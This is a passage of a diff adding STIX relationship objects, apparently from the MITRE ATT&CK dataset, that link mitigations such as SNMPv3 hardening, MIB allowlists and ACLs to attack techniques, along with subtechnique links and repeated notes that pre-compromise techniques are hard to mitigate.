Devices. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:54:23.019Z", + "created": "2020-10-19T23:54:29.872Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "relationship_type": "mitigates", + "description": "Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--86c58566-41e5-452f-b649-b481bfbd1202", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:54:23.125Z", + "created": "2020-10-19T23:54:29.900Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b5dbb4c5-b0b1-40b1-80b6-e9e84ab90067", + "target_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "relationship_type": "mitigates", + "description": "Allowlist MIB objects and implement SNMP views.(Citation: Cisco Securing SNMP)", + "id": "relationship--1cd3a9af-420f-45b6-a8b1-246332b1c49d", + "external_references": [ + { + "source_name": "Cisco Securing SNMP", + "url": "https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html", + "description": "Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:54:23.158Z", + "created": "2020-10-19T23:54:29.923Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b", + "target_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "relationship_type": "mitigates", + "description": "Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)", + "id": "relationship--21907ead-e794-49fd-aa4b-df2c51cdc599", + "external_references": [ + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:54:23.154Z", + "created": "2020-10-19T23:54:29.932Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "relationship_type": "mitigates", + "description": "Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--eaa4e3f4-e3f6-4c1e-9cbf-4801028abfea", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:54:23.150Z", + "created": "2020-10-19T23:54:29.945Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c", + "target_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "relationship_type": "mitigates", + "description": "Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--bd6e2eb9-a024-446f-bf9e-46c7ce4d8919", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T01:54:23.156Z", + "created": "2020-10-19T23:54:29.971Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "relationship_type": "subtechnique-of", + "id": "relationship--e07acc2b-6a92-423e-85be-a9caed4a8ee6", + "type": "relationship", + "modified": "2020-10-20T00:05:48.864Z", + "created": "2020-10-20T00:05:48.864Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "relationship_type": "subtechnique-of", + "id": "relationship--a468fd3d-b1a8-4d1f-b19b-8073a80a0041", + "type": "relationship", + "modified": "2020-10-20T00:06:56.288Z", + "created": "2020-10-20T00:06:56.288Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "subtechnique-of", + "id": "relationship--1f262330-4075-4fce-91b7-c3f0fd7a0739", + "type": "relationship", + "modified": "2020-10-20T00:08:21.787Z", + "created": "2020-10-20T00:08:21.787Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "relationship_type": "subtechnique-of", + "id": "relationship--74192d82-680f-412e-80df-27b86fdfa20c", + "type": "relationship", + "modified": "2020-10-20T00:09:33.144Z", + "created": "2020-10-20T00:09:33.144Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--9a433652-118d-428e-8ff0-551543a062a7", + "type": "relationship", + "modified": "2020-10-24T03:51:44.018Z", + "created": "2020-10-20T01:21:23.726Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--99a5e60d-62f7-4dc6-af50-99e57e92eaab", + "type": "relationship", + "modified": "2020-10-24T03:52:10.890Z", + "created": "2020-10-20T01:23:07.180Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--1dcc92d5-0299-4c6c-b86b-f2d3718a9bda", + "type": "relationship", + "modified": "2020-10-24T03:53:39.283Z", + "created": "2020-10-20T01:25:08.269Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--1dc273bd-fb9d-4a36-a234-37ec11238e26", + "type": "relationship", + "modified": "2020-10-27T02:27:31.297Z", + "created": "2020-10-20T01:37:26.342Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--004fbe29-2537-418e-9951-a2750a5fa901", + "type": "relationship", + "modified": "2020-10-24T04:06:50.513Z", + "created": "2020-10-20T03:11:14.529Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--96311328-0188-437f-b1c6-1f95676732e0", + "type": "relationship", + "modified": "2020-10-24T04:06:09.238Z", + "created": "2020-10-20T03:11:48.916Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--ae6add8b-17b3-4d50-be1a-8e4efec7fc01", + "type": "relationship", + "modified": "2020-10-24T03:58:06.901Z", + "created": "2020-10-20T03:12:36.931Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--db136518-5008-4104-93c1-112c4478c8bf", + "type": "relationship", + "modified": "2020-10-24T03:52:36.938Z", + "created": "2020-10-20T03:20:03.645Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--b97134c8-c42a-4121-ab8b-bf519bf3d457", + "type": "relationship", + "modified": "2020-10-24T03:53:03.436Z", + "created": "2020-10-20T03:20:36.200Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--362f4bd6-59d6-4e3f-81f0-5358b7f3f9d5", + "type": "relationship", + "modified": "2020-10-24T03:45:26.181Z", + "created": "2020-10-20T03:21:37.453Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--611ad683-7772-4592-bbd4-e5589591a76e", + "type": "relationship", + "modified": "2020-10-24T03:46:04.775Z", + "created": "2020-10-20T03:22:16.268Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--48c021af-5bce-4a16-aec1-21970cc59497", + "type": "relationship", + "modified": "2020-10-24T03:46:29.285Z", + "created": "2020-10-20T03:22:48.307Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--78968b8c-61ed-44d9-835c-05eb5b2ab169", + "type": "relationship", + "modified": "2020-10-24T04:02:08.914Z", + "created": "2020-10-20T03:23:24.070Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "relationship_type": "mitigates", + "description": "This cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--c2b9d474-44f8-4815-9f60-be81af2776ab", + "type": "relationship", + "modified": "2020-10-24T04:02:39.830Z", + "created": "2020-10-20T03:24:09.371Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--c3c37431-5f1a-4282-ac0b-fd4270d67cd7", + "type": "relationship", + "modified": "2020-10-25T22:58:23.011Z", + "created": "2020-10-20T03:24:36.273Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--3b1a38d3-8d4c-472f-9433-098560a3208f", + "type": "relationship", + "modified": "2020-10-24T04:03:29.326Z", + "created": "2020-10-20T03:25:10.161Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--175d65f0-0f57-4cad-a655-4f068a1e02ad", + "type": "relationship", + "modified": "2020-10-24T04:04:13.694Z", + "created": "2020-10-20T03:25:40.299Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--bddcd118-8a69-450e-b680-c5d52d5098f4", + "type": "relationship", + "modified": "2020-10-24T04:04:40.303Z", + "created": "2020-10-20T03:26:11.192Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--17ad59c0-1aff-490b-bb43-02e1d0292a87", + "type": "relationship", + "modified": "2020-10-24T04:05:03.928Z", + "created": "2020-10-20T03:26:40.879Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--024d5595-aa4e-4d47-bc31-5b8ea5ed73c0", + "type": "relationship", + "modified": "2020-10-24T04:08:34.102Z", + "created": "2020-10-20T03:29:48.200Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--b03847f1-8b42-4457-8856-d5769e0f6e60", + "type": "relationship", + "modified": "2020-10-24T04:08:59.311Z", + "created": "2020-10-20T03:30:15.348Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--8bc57fb8-9379-4bcb-9f9f-d40cd86bca57", + "type": "relationship", + "modified": "2020-10-24T04:09:48.566Z", + "created": "2020-10-20T03:30:50.436Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--324e2e47-513c-4803-91d7-96d45cdd9480", + "type": "relationship", + "modified": "2020-10-24T04:10:12.460Z", + "created": "2020-10-20T03:31:22.422Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--efb1d5a5-0182-4104-982c-6de98e11a055", + "type": "relationship", + "modified": "2020-10-24T04:10:36.406Z", + "created": "2020-10-20T03:31:52.923Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--87df901e-dd6b-4eae-9a63-b546c169d192", + "type": "relationship", + "modified": "2020-10-24T04:14:58.723Z", + "created": "2020-10-20T03:32:46.759Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--994b4e31-eabb-4aa0-b7c1-e0ade6017009", + "type": "relationship", + "modified": "2020-10-24T04:15:26.956Z", + "created": "2020-10-20T03:33:23.166Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--57c067b0-1325-4bb7-a950-198a6332c8ba", + "type": "relationship", + "modified": "2020-10-24T04:15:53.827Z", + "created": "2020-10-20T03:33:58.292Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--e58cc6e6-cc6c-4a31-9056-e24c8071c736", + "type": "relationship", + "modified": "2020-10-24T04:16:40.084Z", + "created": "2020-10-20T03:34:45.501Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--86c466ea-44e7-4018-a223-ce8d2ab81bc8", + "type": "relationship", + "modified": "2020-10-24T04:17:09.819Z", + "created": "2020-10-20T03:35:25.799Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--d5e474fe-11a9-419b-bf16-734189c8da5d", + "type": "relationship", + "modified": "2020-10-24T04:19:15.415Z", + "created": "2020-10-20T03:35:58.163Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.", + "id": "relationship--17b92de6-f308-4468-8b2e-c1b2edf08e46", + "type": "relationship", + "modified": "2020-10-24T04:19:40.714Z", + "created": "2020-10-20T03:36:29.915Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 